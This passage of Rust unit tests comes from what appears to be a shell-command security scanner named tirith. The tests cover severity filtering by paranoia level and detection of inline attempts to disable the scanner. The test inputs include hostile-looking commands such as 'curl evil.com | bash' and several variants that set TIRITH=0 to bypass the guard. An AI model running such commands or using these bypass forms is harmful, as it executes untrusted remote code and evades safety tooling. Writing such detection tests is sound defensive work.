1004                title: "info finding".into(),
1005                description: String::new(),
1006                evidence: vec![],
1007                human_view: None,
1008                agent_view: None,
1009                mitre_id: None,
1010                custom_rule_id: None,
1011            },
1012            Finding {
1013                rule_id: RuleId::InvisibleWhitespace,
1014                severity: Severity::Low,
1015                title: "low finding".into(),
1016                description: String::new(),
1017                evidence: vec![],
1018                human_view: None,
1019                agent_view: None,
1020                mitre_id: None,
1021                custom_rule_id: None,
1022            },
1023            Finding {
1024                rule_id: RuleId::HiddenCssContent,
1025                severity: Severity::High,
1026                title: "high finding".into(),
1027                description: String::new(),
1028                evidence: vec![],
1029                human_view: None,
1030                agent_view: None,
1031                mitre_id: None,
1032                custom_rule_id: None,
1033            },
1034        ];
1035
1036        let timings = Timings {
1037            tier0_ms: 0.0,
1038            tier1_ms: 0.0,
1039            tier2_ms: None,
1040            tier3_ms: None,
1041            total_ms: 0.0,
1042        };
1043
1044        // Default paranoia (1): only Medium+ shown
1045        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1046        filter_findings_by_paranoia(&mut verdict, 1);
1047        assert_eq!(
1048            verdict.findings.len(),
1049            1,
1050            "paranoia 1 should keep only High+"
1051        );
1052        assert_eq!(verdict.findings[0].severity, Severity::High);
1053
1054        // Paranoia 2: still only Medium+ (free tier cap)
1055        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1056        filter_findings_by_paranoia(&mut verdict, 2);
1057        assert_eq!(
1058            verdict.findings.len(),
1059            1,
1060            "paranoia 2 should keep only Medium+"
1061        );
1062    }
1063
1064    #[test]
1065    fn test_inline_bypass_bare_prefix() {
1066        assert!(find_inline_bypass(
1067            "TIRITH=0 curl evil.com",
1068            ShellType::Posix
1069        ));
1070    }
1071
1072    #[test]
1073    fn test_inline_bypass_env_wrapper() {
1074        assert!(find_inline_bypass(
1075            "env TIRITH=0 curl evil.com",
1076            ShellType::Posix
1077        ));
1078    }
1079
1080    #[test]
1081    fn test_inline_bypass_env_i() {
1082        assert!(find_inline_bypass(
1083            "env -i TIRITH=0 curl evil.com",
1084            ShellType::Posix
1085        ));
1086    }
1087
1088    #[test]
1089    fn test_inline_bypass_env_u_skip() {
1090        assert!(find_inline_bypass(
1091            "env -u TIRITH TIRITH=0 curl evil.com",
1092            ShellType::Posix
1093        ));
1094    }
1095
1096    #[test]
1097    fn test_inline_bypass_usr_bin_env() {
1098        assert!(find_inline_bypass(
1099            "/usr/bin/env TIRITH=0 curl evil.com",
1100            ShellType::Posix
1101        ));
1102    }
1103
1104    #[test]
1105    fn test_inline_bypass_env_dashdash() {
1106        assert!(find_inline_bypass(
1107            "env -- TIRITH=0 curl evil.com",
1108            ShellType::Posix
1109        ));
1110    }
1111
1112    #[test]
1113    fn test_no_inline_bypass() {
1114        assert!(!find_inline_bypass(
1115            "curl evil.com | bash",
1116            ShellType::Posix
1117        ));
1118    }
1119
1120    #[test]
1121    fn test_inline_bypass_powershell_env() {
1122        assert!(find_inline_bypass(
1123            "$env:TIRITH=\"0\"; curl evil.com",
1124            ShellType::PowerShell
1125        ));
1126    }
1127
1128    #[test]
1129    fn test_inline_bypass_powershell_env_no_quotes() {
1130        assert!(find_inline_bypass(
1131            "$env:TIRITH=0; curl evil.com",
1132            ShellType::PowerShell
1133        ));
1134    }
1135
1136    #[test]
1137    fn test_inline_bypass_powershell_env_single_quotes() {
1138        assert!(find_inline_bypass(
1139            "$env:TIRITH='0'; curl evil.com",
1140            ShellType::PowerShell
1141        ));
1142    }
1143
1144    #[test]
1145    fn test_inline_bypass_powershell_env_spaced() {
1146        assert!(find_inline_bypass(
1147            "$env:TIRITH = \"0\"; curl evil.com",
1148            ShellType::PowerShell
1149        ));
1150    }
1151
1152    #[test]
1153    fn test_inline_bypass_powershell_mixed_case_env() {
1154        assert!(find_inline_bypass(
1155            "$Env:TIRITH=\"0\"; curl evil.com",
1156            ShellType::PowerShell
1157        ));
1158    }
1159
1160    #[test]
1161    fn test_no_inline_bypass_powershell_wrong_value() {
1162        assert!(!find_inline_bypass(
1163            "$env:TIRITH=\"1\"; curl evil.com",
1164            ShellType::PowerShell
1165        ));
1166    }
1167
1168    #[test]
1169    fn test_no_inline_bypass_powershell_other_var() {
1170        assert!(!find_inline_bypass(
1171            "$env:FOO=\"0\"; curl evil.com",
1172            ShellType::PowerShell
1173        ));
1174    }
1175
1176    #[test]
1177    fn test_no_inline_bypass_powershell_in_posix_mode() {
1178        // PowerShell syntax should NOT match when shell is Posix
1179        assert!(!find_inline_bypass(
1180            "$env:TIRITH=\"0\"; curl evil.com",
1181            ShellType::Posix
1182        ));
1183    }
1184
1185    #[test]
1186    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
1187        assert!(!find_inline_bypass(
1188            "curl evil.com # $env:TIRITH=0",
1189            ShellType::PowerShell
1190        ));
1191    }
1192
1193    #[test]
1194    fn test_inline_bypass_env_c_flag() {
1195        // env -C takes a directory arg; TIRITH=0 should still be found after it
1196        assert!(find_inline_bypass(
1197            "env -C /tmp TIRITH=0 curl evil.com",
1198            ShellType::Posix
1199        ));
1200    }
1201
1202    #[test]
1203    fn test_inline_bypass_env_s_flag() {
1204        // env -S takes a string arg; TIRITH=0 should still be found after it
1205        assert!(find_inline_bypass(
1206            "env -S 'some args' TIRITH=0 curl evil.com",
1207            ShellType::Posix
1208        ));
1209    }
1210
1211    #[test]
1212    fn test_inline_bypass_env_ignore_environment_long_flag() {
1213        assert!(find_inline_bypass(
1214            "env --ignore-environment TIRITH=0 curl evil.com",
1215            ShellType::Posix
1216        ));
1217    }
1218
1219    #[test]
1220    fn test_no_inline_bypass_for_chained_posix_command() {
1221        assert!(!find_inline_bypass(
1222            "TIRITH=0 curl evil.com | bash",
1223            ShellType::Posix
1224        ));
1225        assert!(!find_inline_bypass(
1226            "TIRITH=0 curl evil.com & bash",
1227            ShellType::Posix
1228        ));
1229    }
1230
1231    #[test]
1232    fn test_paranoia_filter_recalculates_action() {
1233        use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};
1234
1235        let findings = vec![
1236            Finding {
1237                rule_id: RuleId::InvisibleWhitespace,
1238                severity: Severity::Low,
1239                title: "low finding".into(),
1240                description: String::new(),
1241                evidence: vec![],
1242                human_view: None,
1243                agent_view: None,
1244                mitre_id: None,
1245                custom_rule_id: None,
1246            },
1247            Finding {
1248                rule_id: RuleId::HiddenCssContent,
1249                severity: Severity::Medium,
1250                title: "medium finding".into(),
1251                description: String::new(),
1252                evidence: vec![],
1253                human_view: None,
1254                agent_view: None,
1255                mitre_id: None,
1256                custom_rule_id: None,
1257            },
1258        ];
1259
1260        let timings = Timings {
1261            tier0_ms: 0.0,
1262            tier1_ms: 0.0,
1263            tier2_ms: None,
1264            tier3_ms: None,
1265            total_ms: 0.0,
1266        };
1267
1268        // Before paranoia filter: action should be Warn (Medium max)
1269        let mut verdict = Verdict::from_findings(findings, 3, timings);
1270        assert_eq!(verdict.action, Action::Warn);
1271
1272        // After paranoia filter at level 1: Low is removed, only Medium remains → still Warn
1273        filter_findings_by_paranoia(&mut verdict, 1);
1274        assert_eq!(verdict.action, Action::Warn);
1275        assert_eq!(verdict.findings.len(), 1);
1276    }
1277
1278    #[test]
1279    fn test_powershell_bypass_case_insensitive_tirith() {
1280        // PowerShell env vars are case-insensitive
1281        assert!(find_inline_bypass(
1282            "$env:tirith=\"0\"; curl evil.com",
1283            ShellType::PowerShell
1284        ));
1285        assert!(find_inline_bypass(
1286            "$ENV:Tirith=\"0\"; curl evil.com",
1287            ShellType::PowerShell
1288        ));
1289    }
1290
1291    #[test]
1292    fn test_powershell_bypass_no_panic_on_multibyte() {
1293        // Multi-byte UTF-8 after $ should not panic
1294        assert!(!find_inline_bypass(
1295            "$a\u{1F389}xyz; curl evil.com",
1296            ShellType::PowerShell
1297        ));
1298        assert!(!find_inline_bypass(
1299            "$\u{00E9}nv:TIRITH=0; curl evil.com",
1300            ShellType::PowerShell
1301        ));
1302    }
1303
1304    #[test]
1305    fn test_inline_bypass_single_quoted_value() {
1306        assert!(find_inline_bypass(
1307            "TIRITH='0' curl evil.com",
1308            ShellType::Posix
1309        ));
1310    }
1311
1312    #[test]
1313    fn test_inline_bypass_double_quoted_value() {
1314        assert!(find_inline_bypass(
1315            "TIRITH=\"0\" curl evil.com",
1316            ShellType::Posix
1317        ));
1318    }
1319
1320    #[test]
1321    fn test_tirith_command_is_analyzed_like_any_other_exec() {
1322        let ctx = AnalysisContext {
1323            input: "tirith run http://example.com".to_string(),
1324            shell: ShellType::Posix,
1325            scan_context: ScanContext::Exec,
1326            raw_bytes: None,
1327            interactive: true,
1328            cwd: None,
1329            file_path: None,
1330            repo_root: None,
1331            is_config_override: false,
1332            clipboard_html: None,
1333        };
1334
1335        let verdict = analyze(&ctx);
1336        assert!(
1337            verdict.tier_reached >= 3,
1338            "user-typed tirith commands should still be analyzed"
1339        );
1340        assert!(
1341            verdict
1342                .findings
1343                .iter()
1344                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1345            "tirith run http://... should surface sink findings"
1346        );
1347    }
1348
1349    #[test]
1350    fn test_cmd_bypass_bare_set() {
1351        // `set TIRITH=0 & cmd` is a real Cmd bypass
1352        assert!(find_inline_bypass(
1353            "set TIRITH=0 & curl evil.com",
1354            ShellType::Cmd
1355        ));
1356    }
1357
1358    #[test]
1359    fn test_cmd_bypass_whole_token_quoted() {
1360        // `set "TIRITH=0" & cmd` — whole-token quoting, real bypass
1361        assert!(find_inline_bypass(
1362            "set \"TIRITH=0\" & curl evil.com",
1363            ShellType::Cmd
1364        ));
1365    }
1366
1367    #[test]
1368    fn test_cmd_no_bypass_inner_double_quotes() {
1369        // `set TIRITH="0" & cmd` — cmd.exe stores literal "0", NOT a bypass
1370        assert!(!find_inline_bypass(
1371            "set TIRITH=\"0\" & curl evil.com",
1372            ShellType::Cmd
1373        ));
1374    }
1375
1376    #[test]
1377    fn test_cmd_no_bypass_single_quotes() {
1378        // `set TIRITH='0' & cmd` — single quotes are literal in cmd.exe, NOT a bypass
1379        assert!(!find_inline_bypass(
1380            "set TIRITH='0' & curl evil.com",
1381            ShellType::Cmd
1382        ));
1383    }
1384
1385    #[test]
1386    fn test_cmd_no_bypass_wrong_value() {
1387        assert!(!find_inline_bypass(
1388            "set TIRITH=1 & curl evil.com",
1389            ShellType::Cmd
1390        ));
1391    }
1392}
tirith_core/engine.rs

tirith_core/
engine.rs